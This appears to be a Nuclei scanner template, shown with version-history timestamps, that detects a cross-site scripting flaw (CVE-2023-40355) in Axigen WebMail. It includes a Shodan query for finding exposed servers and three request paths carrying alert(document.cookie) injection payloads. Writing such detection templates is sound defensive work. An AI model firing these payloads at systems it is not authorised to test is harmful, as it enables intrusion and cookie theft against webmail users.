2024-02-13 18:16:18 +00:00
id : CVE-2023-40355
info :
2024-02-15 09:28:09 +00:00
name : Axigen WebMail - Cross-Site Scripting
2024-02-13 18:56:51 +00:00
author : amir-h-fallahi
2024-02-13 18:16:18 +00:00
severity : medium
description : |
2024-02-13 18:56:51 +00:00
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
reference :
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
2024-02-15 09:28:09 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
2024-02-13 18:16:18 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
cvss-score : 6.5
2024-02-15 09:28:09 +00:00
cve-id : CVE-2023-40355
cwe-id : CWE-79
2024-02-13 18:56:51 +00:00
epss-score : 0.0006
epss-percentile : 0.22931
2024-02-13 18:16:18 +00:00
metadata :
2024-02-15 09:28:09 +00:00
max-request : 3
verified : true
2024-02-13 18:56:51 +00:00
shodan-query : http.favicon.hash:-1247684400
tags : cve,cve2023,xss,axigen,webmail
2024-02-13 18:16:18 +00:00
2024-02-13 18:56:51 +00:00
http :
- method : GET
2024-02-13 18:16:18 +00:00
path :
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//"
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//"
2024-02-13 18:56:51 +00:00
- "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'"
stop-at-first-match : true
2024-02-15 09:28:09 +00:00
matchers-condition : and
2024-02-13 18:16:18 +00:00
matchers :
- type : word
part : body
words :
- "\\\\'-alert(document.cookie),//"
- "',alert(document.cookie),'"
2024-02-15 09:28:09 +00:00
condition : or
- type : dsl
dsl :
- 'contains(header, "text/html")'
- 'contains(response, "Axigen")'
- 'status_code == 200'
2024-02-13 18:56:51 +00:00
condition : and
